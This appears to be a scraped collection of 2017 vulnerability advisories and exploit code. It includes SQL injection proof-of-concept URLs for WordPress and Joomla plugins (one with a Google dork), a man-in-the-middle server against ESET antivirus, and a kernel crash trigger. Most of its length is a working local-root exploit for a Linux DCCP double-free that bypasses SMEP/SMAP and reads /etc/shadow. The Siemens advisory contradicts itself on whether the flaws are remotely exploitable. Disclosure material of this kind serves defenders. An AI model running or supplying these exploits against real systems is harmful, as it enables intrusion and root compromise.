Siemens RUGGEDCOM NMS

CVSS v3 8.8

ATTENTION: Remotely exploitable/low skill level to exploit.

Vendor: Siemens

Equipment: RUGGEDCOM NMS

Vulnerabilities: Cross-Site Request Forgery, Cross-Site Scripting.

AFFECTED PRODUCTS

Siemens reports that the vulnerabilities affect the following RUGGEDCOM monitoring products:

  • RUGGEDCOM NMS: All versions prior to V2.1.0 (Windows and Linux).

IMPACT

Successful exploitation of these vulnerabilities could allow a remote attacker to perform administrative operations under certain conditions.

MITIGATION

Siemens provides RUGGEDCOM NMS V2.1.0 which fixes the vulnerabilities and recommends users update to the new version. Information on how to obtain the latest RUGGEDCOM software and firmware can be found at the following location on the Siemens web site:

https://support.industry.siemens.com/cs/ww/en/view/109745179

For more information on this vulnerability and more detailed mitigation instructions, please see Siemens Security Advisory SSA-363881 at the following location:

http://www.siemens.com/cert/en/cert-security-advisories.htm

As a general security measure Siemens strongly recommends protecting network access to the RUGGEDCOM NMS with appropriate mechanisms and configuring the environment according to Siemens’ operational guidelines in order to run the devices in a protected IT environment.

https://www.siemens.com/cert/operational-guidelines-industrial-security

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities. These vulnerabilities are not remotely exploitable.

VULNERABILITY OVERVIEW

The web application (Ports 8080/TCP and 8081/TCP) could allow a remote attacker to perform a cross-site request forgery (CSRF) attack, potentially allowing an attacker to execute administrative operations, provided the targeted user has an active session and is induced to trigger a malicious request.

CVE-2017-2682 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

A non-privileged user of the web application (Ports 8080/TCP and 8081/TCP) could perform a persistent cross-site scripting (XSS) attack, potentially resulting in acquisition of administrative permissions.

CVE-2017-2683 has been assigned to this vulnerability. A CVSS v3 base score of 6.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N).

BACKGROUND

Critical Infrastructure Sectors: Energy, Healthcare and Public Health, and Transportation Systems

Countries/Areas Deployed: Worldwide

Company Headquarters Location: Germany

WordPress Kama Click Counter 3.4.9 SQL Injection

=============================================
MGC ALERT 2017-002
– Original release date: February 21, 2017
– Last revised: February 28, 2017
– Discovered by: Manuel García Cárdenas
– Severity: 7.1/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
————————-
WordPress Plugin Kama Click Counter 3.4.9 – Blind SQL Injection

II. BACKGROUND
————————-
Using this plugin you will have statistics on clicks on your files or any
other link (not file).

III. DESCRIPTION
————————-
This bug was found in the admin portal, in the
/wp-content/plugins/kama-clic-counter/admin.php file.

Lines 172 and 173 do not sanitize the input values:

$order_by = ($x= & $_GET['order_by']) ? esc_sql($x) : 'link_date';
$order = ($x= & $_GET['order']) ? esc_sql($x) : 'DESC';

And on line 182 or 186 the SQL statement is executed:

$sql = "SELECT * FROM $wpdb->kcc_clicks WHERE link_url LIKE '%$s%' OR
link_name LIKE '%$s%' ORDER BY $order_by $order LIMIT $offset, $limit";
$sql = "SELECT * FROM $wpdb->kcc_clicks ORDER BY $order_by $order LIMIT
$offset, $limit";

To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code: esc_sql() only escapes quotes, and the ORDER BY
clause is an unquoted identifier position, so the escaped value is still interpreted
as SQL.
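Why the quote-escaping call does not help here, shown in Python as an added example that is not the advisory's or the plugin's code: the payload from the PoC contains no quotes, so an esc_sql()-style helper passes it through unchanged, while an allowlist of column names and sort directions rejects it before any SQL is built. The table name wp_kcc_clicks and the helper esc_sql_like() are assumptions.

```python
# Added example (not the plugin's code): why a quote-escaping helper does not
# protect an ORDER BY position, and what an allowlist check does instead.
# The table name wp_kcc_clicks and the helper esc_sql_like() are assumptions.

ALLOWED_ORDER_BY = {"link_date", "link_name"}   # columns the advisory shows
ALLOWED_ORDER = {"ASC", "DESC"}


def esc_sql_like(value):
    """Mimics a quote-escaping helper such as WordPress's esc_sql(): it
    backslash-escapes quotes and backslashes and nothing else, so commas,
    parentheses, keywords and function calls pass through unchanged."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"'))


def vulnerable_query(params, offset=0, limit=20):
    """Builds the statement the way the advisory shows admin.php doing it:
    escape, then interpolate straight into ORDER BY."""
    order_by = esc_sql_like(params.get("order_by") or "link_date")
    order = esc_sql_like(params.get("order") or "DESC")
    return ("SELECT * FROM wp_kcc_clicks ORDER BY %s %s LIMIT %d, %d"
            % (order_by, order, offset, limit))


def hardened_query(params, offset=0, limit=20):
    """Identifiers and keywords cannot be escaped, only allowlisted:
    anything outside the fixed sets is rejected before SQL is built."""
    order_by = params.get("order_by") or "link_date"
    order = (params.get("order") or "DESC").upper()
    if order_by not in ALLOWED_ORDER_BY:
        raise ValueError("order_by rejected: %r" % order_by)
    if order not in ALLOWED_ORDER:
        raise ValueError("order rejected: %r" % order)
    return ("SELECT * FROM wp_kcc_clicks ORDER BY %s %s LIMIT %d, %d"
            % (order_by, order, int(offset), int(limit)))


def is_rejected(params):
    """True when the hardened builder refuses the request."""
    try:
        hardened_query(params)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The time-based payload from the advisory's PoC URL (URL-decoded).
    poc = {"order_by": "link_name",
           "order": "ASC,(select*from(select(sleep(2)))a)"}
    print(vulnerable_query(poc))   # the payload survives: nothing to escape
    print(is_rejected(poc))        # True
```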

IV. PROOF OF CONCEPT
————————-
The following URLs have been confirmed to suffer from time-based SQL
injection.

Time Based SQL Injection POC:

/wordpress/wp-admin/admin.php?page=kama-clic-counter&order_by=link_name&order=ASC%2c(select*from(select(sleep(2)))a)&paged=1
(2 seconds of response)

/wordpress/wp-admin/admin.php?page=kama-clic-counter&order_by=link_name&order=ASC%2c(select*from(select(sleep(30)))a)&paged=1
(30 seconds of response)

V. BUSINESS IMPACT
————————-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
————————-
Kama Click Counter <= 3.4.9

VII. SOLUTION
————————-
Disable the plugin until a fix is available.

VIII. REFERENCES
————————-
https://wordpress.org/plugins-wp/kama-clic-counter/

IX. CREDITS
————————-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
————————-
February 21, 2017 1: Initial release
February 28, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
————————-
February 21, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
February 21, 2017 2: Sent to vendor
February 24, 2017 3: New contact with vendor without response
February 28, 2017 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
————————-
The information contained within this advisory is supplied “as-is” with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
————————-
Manuel Garcia Cardenas
Pentester

SAP BusinessObjects Financial Consolidation 10.0.0.1933 Cross Site Scripting

[Description]
Cross-site scripting (XSS) vulnerability in the help component of SAP
BusinessObjects Financial Consolidation 10.0.0.1933 allows remote
attackers to inject arbitrary web script or HTML via a GET request.

——————————————

[Additional Information]
The help pages of SAP BusinessObjects Financial Consolidation are
vulnerable to a reflected cross-site scripting (XSS) attack. The help
pages are built out of multiple iframes. The frameset.htm can be
requested with JavaScript code as part of the parameters. The
parameters are written using JavaScript into the "src" attribute of an
"iframe" tag. The JavaScript code reads the URL that is present in the
browser and does basic filtering based on regular expressions to
verify whether a URI is included in the argument. However, this filter
can be bypassed.

——————————————

[Vulnerability Type]
Cross Site Scripting (XSS)

——————————————

[Vendor of Product]
SAP

——————————————

[Affected Product Code Base]
SAP BusinessObjects Financial Consolidation – 10.0.0.1933

——————————————

[Affected Component]
Help component (/finance/help/en/frameset.htm)

——————————————

[Attack Type]
Remote

——————————————

[Attack Vectors]
An attacker could trick a user into clicking on a malicious link that
redirects the user to the trusted web application but carries malicious
JavaScript code, which could, for example, load external content serving
malware. The attacker could also create a web application that is loaded
as an iframe to trick the victim into entering personal information or
credentials for SAP BFC.

——————————————

[Reference & Solution]
Credits: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=448476554
SAP Security Patch Day 11 / 2016: https://launchpad.support.sap.com/#/notes/2386447
SAP Security note: https://launchpad.support.sap.com/#/notes/2368106

——————————————

[Has vendor confirmed or acknowledged the vulnerability?]
true

——————————————

[Discoverer]
Deloitte, Sander Maas & Dima van de Wouw

——————————————

[Reserved CVE]
CVE-2017-6061

Kind regards,
Deloitte Zero Day

ESET Endpoint Antivirus 6 Remote Code Execution

CVE-2016-9892 – Remote Code Execution as Root via ESET Endpoint Antivirus 6
—————————————————————————

Summary
=======
Name: Remote Code Execution as Root via ESET Endpoint Antivirus 6
CVE: CVE-2016-9892
Discoverers: Jason Geffner and Jan Bee
Vendor: ESET
Product: ESET Endpoint Antivirus 6 for macOS
Risk: Critical
Discovery Date: 2016-11-03
Publication Date: 2017-02-27
Fixed Version: 6.4.168.0

Introduction
============
Per ESET’s online material, “ESET Endpoint Antivirus for OS X delivers award-
winning cross-platform protection for multi-platform environments. It protects
against malware and spyware and shields end users from fake websites phishing
for sensitive information such as usernames, passwords or credit card details.
Unauthorized devices can be blocked from the system entirely. The solution’s
highly intuitive interface allows for quick navigation.”

Vulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an
outdated XML parsing library and do not perform proper server authentication,
allowing for remote unauthenticated attackers to perform arbitrary code
execution as root on vulnerable clients.

Vulnerability
=============
The esets_daemon service, which runs as root, is statically linked with an
outdated version of the POCO XML parser library (https://pocoproject.org/) —
version 1.4.6p1 from 2013-03-06. This version of POCO is based on Expat
(http://expat.sourceforge.net/) version 2.0.1 from 2007-06-05, which has a
publicly known XML parsing vulnerability (CVE-2016-0718) that allows for
arbitrary code execution via malformed XML content.

When ESET Endpoint Antivirus tries to activate its license, esets_daemon sends a
request to https://edf.eset.com/edf. The esets_daemon service does not validate
the web server’s certificate, so a man-in-the-middle can intercept the request
and respond using a self-signed HTTPS certificate. The esets_daemon service
parses the response as an XML document, thereby allowing the attacker to supply
malformed content and exploit CVE-2016-0718 to achieve arbitrary code execution
as root.

Proof of Concept
================
Extract overflow.xml from https://bugzilla.suse.com/attachment.cgi?id=676490
(ZIP file containing a public proof-of-concept for CVE-2016-0718) and run the
following Python program:
________________________________________________________________________________
import BaseHTTPServer, SimpleHTTPServer, ssl, subprocess

class XmlHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    # Answers the license-activation POST with the malformed XML file.
    def do_POST(self):
        with open("overflow.xml") as f:
            xml = f.read()
        self.send_response(200)
        self.send_header("Content-Type", "text/xml")
        self.send_header("Content-Length", len(xml))
        self.end_headers()
        self.wfile.write(xml)

    # Accepts the proxy CONNECT and upgrades the socket to TLS with the
    # self-signed certificate generated below.
    def do_CONNECT(self):
        self.wfile.write("HTTP/1.1 200 Connection Established\r\n")
        self.end_headers()
        self.connection = ssl.wrap_socket(
            self.connection, certfile="/tmp/xml.crt",
            keyfile="/tmp/xml.key", server_side=True)
        self.rfile = self.connection.makefile("rb", self.rbufsize)
        self.wfile = self.connection.makefile("wb", self.wbufsize)
        self.close_connection = 0

subprocess.call("openssl req -newkey rsa:2048 -x509 -nodes -subj " +
                "/CN=edf.eset.com -out /tmp/xml.crt -keyout /tmp/xml.key",
                shell=True)

BaseHTTPServer.HTTPServer(("localhost", 4443), XmlHandler).serve_forever()
________________________________________________________________________________

Next, open the ESET Endpoint Antivirus UI, choose “Setup –> Enter application
preferences…”, and enable a local proxy server for localhost:4443 (this proxy
configuration is used to simulate a man-in-the-middle attack; a real-world
attack would not require a victim to enable a proxy server).

Next, in the ESET Endpoint Antivirus UI, choose “Help –> Activate Product”,
enter any License Key value you like (such as 0000-0000-0000-0000-0000), and
press “Activate”.

The esets_daemon process will immediately crash (the public PoC overflow.xml
file used above just demonstrates that the vulnerability exists; it does not
perform actual code execution). You can confirm this by running
/Applications/Utilities/Console.app/Contents/MacOS/Console and seeing that
esets_daemon crashed.

Mitigation
==========
ESET patched this vulnerability in ESET Endpoint Antivirus version 6.4.168.0.

From the product's change log on
https://www.eset.com/us/business/endpoint-security/mac-antivirus/:

Version 6.4.168.0
– Added: Product verifies ESET SSL certificate on all supported OS X/macOS
– Added: Upgraded POCO parsing library to the latest build

Discoverers
===========
This vulnerability was discovered and reported to ESET by Jason Geffner and Jan
Bee of the Google Security Team.

Timeline
========
2016-11-03 – Vulnerability discovered
2016-11-03 – Vulnerability reported to ESET Security Team
2016-11-10 – Phone call between Google and ESET to discuss vulnerability
2016-02-08 – ESET provided Google with updated build
2016-02-21 – Google confirmed vulnerability remediated
2016-02-21 – ESET publicly released version 6.4.168.0
2016-02-27 – Public disclosure

Linux Kernel 4.4.0 Ubuntu DCCP Double-Free Crash

// A trigger for CVE-2017-6074, crashes kernel.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Andrey Konovalov

#define _GNU_SOURCE

#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include
#include
#include

#include

int main() {
    struct sockaddr_in6 sa1;
    sa1.sin6_family = AF_INET6;
    sa1.sin6_port = htons(20002);
    inet_pton(AF_INET6, "::1", &sa1.sin6_addr);
    sa1.sin6_flowinfo = 0;
    sa1.sin6_scope_id = 0;

    int optval = 8;

    int s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
    bind(s1, &sa1, 0x20);
    listen(s1, 0x9);

    setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4);

    int s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
    connect(s2, &sa1, 0x20);

    shutdown(s1, SHUT_RDWR);
    close(s1);
    shutdown(s2, SHUT_RDWR);
    close(s2);

    return 0;
}

Joomla OneVote! 1.0 SQL Injection

# # # # # 
# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_onevote
# Date: 27.02.2017
# Vendor Homepage: http://advcomsys.com/
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
# Demo: http://advcomsys.com/index.php/joomla-demos/elections
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
# +/*!50000union*/[email protected]@version-- -
# # # # #

Linux Kernel 4.4.0 Ubuntu DCCP Double-Free Privilege Escalation

// A proof-of-concept local root exploit for CVE-2017-6074.
// Includes a semireliable SMAP/SMEP bypass.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Usage:
// $ gcc poc.c -o pwn
// $ ./pwn
// [.] namespace sandbox setup successfully
// [.] disabling SMEP & SMAP
// [.] scheduling 0xffffffff81064550(0x406e0)
// [.] waiting for the timer to execute
// [.] done
// [.] SMEP & SMAP should be off now
// [.] getting root
// [.] executing 0x402043
// [.] done
// [.] should be root now
// [.] checking if we got root
// [+] got r00t ^_^
// [!] don't kill the exploit binary, the kernel will crash
// # cat /etc/shadow
// …
// daemon:*:17149:0:99999:7:::
// bin:*:17149:0:99999:7:::
// sys:*:17149:0:99999:7:::
// sync:*:17149:0:99999:7:::
// games:*:17149:0:99999:7:::
// …
//
// Andrey Konovalov

#define _GNU_SOURCE

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include

#include
#include
#include
#include

#include
#include
#include

#define SMEP_SMAP_BYPASS 1

// Needed for local root.
#define COMMIT_CREDS 0xffffffff810a2840L
#define PREPARE_KERNEL_CRED 0xffffffff810a2c30L
#define SHINFO_OFFSET 1728

// Needed for SMEP_SMAP_BYPASS.
#define NATIVE_WRITE_CR4 0xffffffff81064550ul
#define CR4_DESIRED_VALUE 0x406e0ul
#define TIMER_OFFSET (728 + 48 + 104)

#define KMALLOC_PAD 128
#define KMALLOC_WARM 32
#define CATCH_FIRST 6
#define CATCH_AGAIN 16
#define CATCH_AGAIN_SMALL 64

// Port is incremented on each use.
static int port = 11000;

void debug(const char *msg) {
    /*
    char buffer[32];
    snprintf(&buffer[0], sizeof(buffer), "echo '%s' > /dev/kmsg\n", msg);
    system(buffer);
    */
}

// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *

struct ubuf_info {
    uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
    uint64_t ctx;      // void *
    uint64_t desc;     // unsigned long
};

struct skb_shared_info {
    uint8_t nr_frags;        // unsigned char
    uint8_t tx_flags;        // __u8
    uint16_t gso_size;       // unsigned short
    uint16_t gso_segs;       // unsigned short
    uint16_t gso_type;       // unsigned short
    uint64_t frag_list;      // struct sk_buff *
    uint64_t hwtstamps;      // struct skb_shared_hwtstamps
    uint32_t tskey;          // u32
    uint32_t ip6_frag_id;    // __be32
    uint32_t dataref;        // atomic_t
    uint64_t destructor_arg; // void *
    uint8_t frags[16][17];   // skb_frag_t frags[MAX_SKB_FRAGS];
};

struct ubuf_info ui;

void init_skb_buffer(char* buffer, void *func) {
    memset(&buffer[0], 0, 2048);

    struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET];

    ssi->tx_flags = 0xff;
    ssi->destructor_arg = (uint64_t)&ui;
    ssi->nr_frags = 0;
    ssi->frag_list = 0;

    ui.callback = (unsigned long)func;
}

struct timer_list {
    void *next;
    void *prev;
    unsigned long expires;
    void (*function)(unsigned long);
    unsigned long data;
    unsigned int flags;
    int slack;
};

void init_timer_buffer(char* buffer, void *func, unsigned long arg) {
    memset(&buffer[0], 0, 2048);

    struct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET];

    timer->next = 0;
    timer->prev = 0;
    timer->expires = 4294943360;
    timer->function = func;
    timer->data = arg;
    timer->flags = 1;
    timer->slack = -1;
}

// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *

struct dccp_handle {
    struct sockaddr_in6 sa;
    int s1;
    int s2;
};

void dccp_init(struct dccp_handle *handle, int port) {
    handle->sa.sin6_family = AF_INET6;
    handle->sa.sin6_port = htons(port);
    inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
    handle->sa.sin6_flowinfo = 0;
    handle->sa.sin6_scope_id = 0;

    handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
    if (handle->s1 == -1) {
        perror("socket(SOCK_DCCP)");
        exit(EXIT_FAILURE);
    }

    int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
    if (rv != 0) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }

    rv = listen(handle->s1, 0x9);
    if (rv != 0) {
        perror("listen()");
        exit(EXIT_FAILURE);
    }

    int optval = 8;
    rv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO,
                    &optval, sizeof(optval));
    if (rv != 0) {
        perror("setsockopt(IPV6_RECVPKTINFO)");
        exit(EXIT_FAILURE);
    }

    handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
    if (handle->s2 == -1) { // checks the second socket (the original re-tested s1)
        perror("socket(SOCK_DCCP)");
        exit(EXIT_FAILURE);
    }
}

void dccp_kmalloc_kfree(struct dccp_handle *handle) {
    int rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
    if (rv != 0) {
        perror("connect(SOCK_DCCP)");
        exit(EXIT_FAILURE);
    }
}

void dccp_kfree_again(struct dccp_handle *handle) {
    int rv = shutdown(handle->s1, SHUT_RDWR);
    if (rv != 0) {
        perror("shutdown(SOCK_DCCP)");
        exit(EXIT_FAILURE);
    }
}

void dccp_destroy(struct dccp_handle *handle) {
    close(handle->s1);
    close(handle->s2);
}

// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * *

struct udp_fifo_handle {
    int fds[2];
};

void udp_fifo_init(struct udp_fifo_handle* handle) {
    int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds);
    if (rv != 0) {
        perror("socketpair()");
        exit(EXIT_FAILURE);
    }
}

void udp_fifo_destroy(struct udp_fifo_handle* handle) {
    close(handle->fds[0]);
    close(handle->fds[1]);
}

void udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) {
    int rv = send(handle->fds[0], buffer, 1536, 0);
    if (rv != 1536) {
        perror("send()");
        exit(EXIT_FAILURE);
    }
}

void udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) {
    char buffer[128];
    int rv = send(handle->fds[0], &buffer[0], 128, 0);
    if (rv != 128) {
        perror("send()");
        exit(EXIT_FAILURE);
    }
}

void udp_fifo_kfree(struct udp_fifo_handle* handle) {
    char buffer[2048];
    int rv = recv(handle->fds[1], &buffer[0], 1536, 0);
    if (rv != 1536) {
        perror("recv()");
        exit(EXIT_FAILURE);
    }
}

int timer_kmalloc() {
    int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
    if (s == -1) {
        perror("socket(SOCK_DGRAM)");
        exit(EXIT_FAILURE);
    }
    return s;
}

#define CONF_RING_FRAMES 1
void timer_schedule(int handle, int timeout) {
    int optval = TPACKET_V3;
    int rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION,
                        &optval, sizeof(optval));
    if (rv != 0) {
        perror("setsockopt(PACKET_VERSION)");
        exit(EXIT_FAILURE);
    }
    struct tpacket_req3 tp;
    memset(&tp, 0, sizeof(tp));
    tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
    tp.tp_block_nr = 1;
    tp.tp_frame_size = getpagesize();
    tp.tp_frame_nr = CONF_RING_FRAMES;
    tp.tp_retire_blk_tov = timeout;
    rv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING,
                    (void *)&tp, sizeof(tp));
    if (rv != 0) {
        perror("setsockopt(PACKET_RX_RING)");
        exit(EXIT_FAILURE);
    }
}

void socket_sendmmsg(int sock, char *buffer) {
    struct mmsghdr msg[1];

    msg[0].msg_hdr.msg_iovlen = 0;

    // Buffer to kmalloc.
    msg[0].msg_hdr.msg_control = &buffer[0];
    msg[0].msg_hdr.msg_controllen = 2048;

    // Make sendmmsg exit easy with EINVAL.
    msg[0].msg_hdr.msg_name = "root";
    msg[0].msg_hdr.msg_namelen = 1;

    int rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);
    if (rv == -1 && errno != EINVAL) {
        perror("[-] sendmmsg()");
        exit(EXIT_FAILURE);
    }
}

void sendmmsg_kmalloc_kfree(int port, char *buffer) {
    int sock[2];

    int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock);
    if (rv != 0) {
        perror("socketpair()");
        exit(EXIT_FAILURE);
    }

    socket_sendmmsg(sock[0], buffer);

    close(sock[0]);
}

// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * *

void dccp_connect_pad(struct dccp_handle *handle, int port) {
    handle->sa.sin6_family = AF_INET6;
    handle->sa.sin6_port = htons(port);
    inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
    handle->sa.sin6_flowinfo = 0;
    handle->sa.sin6_scope_id = 0;

    handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
    if (handle->s1 == -1) {
        perror("socket(SOCK_DCCP)");
        exit(EXIT_FAILURE);
    }

    int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
    if (rv != 0) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }

    rv = listen(handle->s1, 0x9);
    if (rv != 0) {
        perror("listen()");
        exit(EXIT_FAILURE);
    }

    handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
    if (handle->s2 == -1) { // checks the second socket (the original re-tested s1)
        perror("socket(SOCK_DCCP)");
        exit(EXIT_FAILURE);
    }

    rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
    if (rv != 0) {
        perror("connect(SOCK_DCCP)");
        exit(EXIT_FAILURE);
    }
}

void dccp_kmalloc_pad() {
    int i;
    struct dccp_handle handle;
    for (i = 0; i < 4; i++) {
        dccp_connect_pad(&handle, port++);
    }
}

void timer_kmalloc_pad() {
    int i;
    for (i = 0; i < 4; i++) {
        socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
    }
}

void udp_kmalloc_pad() {
    int i, j;
    char dummy[2048];
    struct udp_fifo_handle uh[16];
    for (i = 0; i < KMALLOC_PAD / 16; i++) {
        udp_fifo_init(&uh[i]);
        for (j = 0; j < 16; j++)
            udp_fifo_kmalloc(&uh[i], &dummy[0]);
    }
}

void kmalloc_pad() {
    debug("dccp kmalloc pad");
    dccp_kmalloc_pad();
    debug("timer kmalloc pad");
    timer_kmalloc_pad();
    debug("udp kmalloc pad");
    udp_kmalloc_pad();
}

void udp_kmalloc_warm() {
    int i, j;
    char dummy[2048];
    struct udp_fifo_handle uh[16];
    for (i = 0; i < KMALLOC_WARM / 16; i++) {
        udp_fifo_init(&uh[i]);
        for (j = 0; j < 16; j++)
            udp_fifo_kmalloc(&uh[i], &dummy[0]);
    }
    for (i = 0; i < KMALLOC_WARM / 16; i++) {
        for (j = 0; j < 16; j++)
            udp_fifo_kfree(&uh[i]);
    }
}

void kmalloc_warm() {
    udp_kmalloc_warm();
}

// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * *

// Executes func(arg) from interrupt context multiple times.
void kernel_exec_irq(void *func, unsigned long arg) {
    int i;
    struct dccp_handle dh;
    struct udp_fifo_handle uh1, uh2, uh3, uh4;
    char dummy[2048];
    char buffer[2048];

    printf("[.] scheduling %p(%p)\n", func, (void *)arg);

    memset(&dummy[0], 0xc3, 2048);
    init_timer_buffer(&buffer[0], func, arg);

    udp_fifo_init(&uh1);
    udp_fifo_init(&uh2);
    udp_fifo_init(&uh3);
    udp_fifo_init(&uh4);

    debug("kmalloc pad");
    kmalloc_pad();

    debug("kmalloc warm");
    kmalloc_warm();

    debug("dccp init");
    dccp_init(&dh, port++);

    debug("dccp kmalloc kfree");
    dccp_kmalloc_kfree(&dh);

    debug("catch 1");
    for (i = 0; i < CATCH_FIRST; i++)
        udp_fifo_kmalloc(&uh1, &dummy[0]);

    debug("dccp kfree again");
    dccp_kfree_again(&dh);

    debug("catch 2");
    for (i = 0; i < CATCH_FIRST; i++)
        udp_fifo_kmalloc(&uh2, &dummy[0]);

    int timers[CATCH_FIRST];
    debug("catch 1 -> timer");
    for (i = 0; i < CATCH_FIRST; i++) {
        udp_fifo_kfree(&uh1);
        timers[i] = timer_kmalloc();
    }

    debug("catch 1 small");
    for (i = 0; i < CATCH_AGAIN_SMALL; i++)
        udp_fifo_kmalloc_small(&uh4);

    debug("schedule timers");
    for (i = 0; i < CATCH_FIRST; i++)
        timer_schedule(timers[i], 500);

    debug("catch 2 -> overwrite timers");
    for (i = 0; i < CATCH_FIRST; i++) {
        udp_fifo_kfree(&uh2);
        udp_fifo_kmalloc(&uh3, &buffer[0]);
    }

    debug("catch 2 small");
    for (i = 0; i < CATCH_AGAIN_SMALL; i++)
        udp_fifo_kmalloc_small(&uh4);

    printf("[.] waiting for the timer to execute\n");

    debug("wait");
    sleep(1);

    printf("[.] done\n");
}

void disable_smep_smap() {
    printf("[.] disabling SMEP & SMAP\n");
    kernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE);
    printf("[.] SMEP & SMAP should be off now\n");
}

// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * *

// Executes func() from process context.
void kernel_exec(void *func) {
    int i;
    struct dccp_handle dh;
    struct udp_fifo_handle uh1, uh2, uh3;
    char dummy[2048];
    char buffer[2048];

    printf("[.] executing %p\n", func);

    memset(&dummy[0], 0, 2048);
    init_skb_buffer(&buffer[0], func);

    udp_fifo_init(&uh1);
    udp_fifo_init(&uh2);
    udp_fifo_init(&uh3);

    debug("kmalloc pad");
    kmalloc_pad();

    debug("kmalloc warm");
    kmalloc_warm();

    debug("dccp init");
    dccp_init(&dh, port++);

    debug("dccp kmalloc kfree");
    dccp_kmalloc_kfree(&dh);

    debug("catch 1");
    for (i = 0; i < CATCH_FIRST; i++)
        udp_fifo_kmalloc(&uh1, &dummy[0]);

    debug("dccp kfree again:");
    dccp_kfree_again(&dh);

    debug("catch 2");
    for (i = 0; i < CATCH_FIRST; i++)
        udp_fifo_kmalloc(&uh2, &dummy[0]);

    debug("catch 1 -> overwrite");
    for (i = 0; i < CATCH_FIRST; i++) {
        udp_fifo_kfree(&uh1);
        sendmmsg_kmalloc_kfree(port++, &buffer[0]);
    }
    debug("catch 2 -> free & trigger");
    for (i = 0; i < CATCH_FIRST; i++)
        udp_fifo_kfree(&uh2);

    debug("catch 1 & 2");
